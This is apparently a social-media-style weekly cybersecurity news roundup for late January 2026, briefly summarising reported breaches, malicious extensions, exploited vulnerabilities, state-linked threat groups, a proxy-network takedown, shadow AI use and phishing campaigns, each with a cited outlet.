Another week, another avalanche of cyber chaos! From dating apps getting breached (swipe left on that security posture) to 1.5 million devs accidentally installing code-stealing VS Code extensions, it’s been a wild ride.

This week’s highlights: ShinyHunters went on a shopping spree, North Korean hackers are forming splinter groups like a K-pop band, and apparently 175,000 AI servers are just... out there... exposed. Also, half your employees are using shadow AI tools, and your C-suite is leading the charge.

Check out the full breakdown for all the gory details, zero-days, and infrastructure takedowns that made this week memorable (for all the wrong reasons).

#CyberThreats #InfoSecCommunity #ThreatIntelligence #Malware #DataBreach #Ransomware #FWU #fridaywrapup

Major Cyberattacks & Incidents

This week saw multiple high-profile breaches spanning dating apps to business intelligence platforms.

• 💔 Dating apps Match, Hinge, and OkCupid, along with Panera Bread, were breached by ShinyHunters ransomware group, exposing millions of customer records with varying impact levels. (Published on 30-Jan-2026, Malwarebytes). Read More

• 📊 Crunchbase confirmed a data breach after ShinyHunters’ hacking campaign targeted multiple platforms including SoundCloud and Betterment, compromising business intelligence data. (Published on 26-Jan-2026, SecurityWeek). Read More

• 🎣 ShinyHunters expanded operations to target over 100 organizations using vishing tactics and fake login pages to bypass SSO security and steal corporate data. (Published on 27-Jan-2026, Hackread). Read More

Malware & Vulnerabilities

Attackers deployed sophisticated malware campaigns across multiple platforms, from developer tools to mobile apps.

• 💻 Two malicious Visual Studio Code AI extensions with 1.5 million combined installs masqueraded as coding assistants while secretly exfiltrating developer source code to China-based servers. (Published on 26-Jan-2026, The Hacker News). Read More

• 🖱️ ClickFix attacks evolved using fake CAPTCHAs combined with signed Microsoft App-V scripts to distribute Amatera infostealer, avoiding common detection patterns through sophisticated execution methods. (Published on 27-Jan-2026, The Hacker News). Read More

• 🏧 Federal authorities charged 31 additional suspects linked to ATM jackpotting operations allegedly orchestrated by Venezuelan gang Tren de Aragua using specialized malware. (Published on 27-Jan-2026, BleepingComputer). Read More

• 🍎 Mac users face increased risk as malicious Google Ads direct searches for legitimate software to fake Mac Cleaner pages distributing malware. (Published on 29-Jan-2026, Hackread). Read More

• 📱 Arsink spyware spread across 143 countries by disguising itself as WhatsApp, YouTube, Instagram, and TikTok, targeting Android users in another widespread mobile malware campaign. (Published on 30-Jan-2026, Hackread). Read More

• 🌐 Researchers discovered malicious Chrome extensions hijacking affiliate links, stealing data, and collecting OpenAI ChatGPT authentication tokens, including a fake Amazon Ads Blocker. (Published on 30-Jan-2026, The Hacker News). Read More

Critical Vulnerabilities & Zero-Days

Critical security flaws and exploited vulnerabilities demand immediate attention from security teams.

• ⚠️ Ivanti disclosed two critical vulnerabilities in Endpoint Manager Mobile (CVE-2026-1281 and CVE-2026-1340) actively exploited in zero-day attacks against enterprise systems. (Published on 29-Jan-2026, BleepingComputer). Read More

• 📡 Nearly 800,000 Telnet servers remain exposed to remote attacks as threat actors exploit a critical authentication bypass vulnerability in GNU InetUtils telnetd server. (Published on 26-Jan-2026, BleepingComputer). Read More

• 🔓 Critical sandbox escape vulnerability in Grist-Core enables remote code execution via malicious formulas, highlighting risks in Pyodide-based security implementations. (Published on 27-Jan-2026, Infosecurity). Read More

Espionage & Data Extraction

State-sponsored threat actors continue evolving their tactics and operational structures.

• 🐉 Chinese espionage group Mustang Panda upgraded its CoolClient backdoor to steal browser login credentials and monitor clipboard activity in targeted surveillance operations. (Published on 27-Jan-2026, BleepingComputer). Read More

• 🇰🇵 Long-running North Korean threat group with Lazarus lineage has split into three distinct operations focused on espionage and cryptocurrency theft, according to CrowdStrike research. (Published on 29-Jan-2026, CyberScoop). Read More

Infrastructure & Operations

Google disrupted a massive malicious proxy network affecting millions of devices globally.

• 🛡️ Google disrupted IPIDEA proxy network, one of the largest residential proxy operations that enrolled devices through SDKs for mobile and desktop applications. (Published on 29-Jan-2026, SecurityWeek). Read More

• 🌍 Google’s action removed millions of compromised devices from IPIDEA’s infrastructure, though not completely, highlighting ongoing challenges in dismantling cybercriminal proxy networks. (Published on 30-Jan-2026, CyberScoop). Read More

AI & Policy

AI security concerns expand as organizations grapple with exposed infrastructure and shadow AI adoption.

• 🤖 Investigation uncovered 175,000 publicly accessible Ollama AI servers across 130 countries operating outside managed infrastructure, creating massive unmanaged AI compute exposure. (Published on 29-Jan-2026, The Hacker News). Read More

• 👥 Nearly half of employees use unsanctioned AI tools, with 69% of executives prioritizing speed over security as shadow AI proliferates across enterprises. (Published on 30-Jan-2026, CSO Online). Read More

Cybersecurity Policy & Industry

Stakeholders collaborate on voluntary frameworks to address emerging security challenges.

• 🤝 Industry leaders, government agencies, and nonprofits held weekend discussions advancing voluntary rules for commercial hacking tools under the Pall Mall Process framework. (Published on 26-Jan-2026, CyberScoop). Read More

Social Engineering & Phishing

Attackers continue exploiting trusted platforms for credential theft.

• 📧 Scammers abused Microsoft Teams invitations to send 12,866 fake billing notice emails reaching approximately 6,135 users in phone-based phishing campaign. (Published on 26-Jan-2026, Hackread). Read More

Stay informed and secure in the tech and cybersecurity world. Have a great weekend, and remember to patch and protect your systems!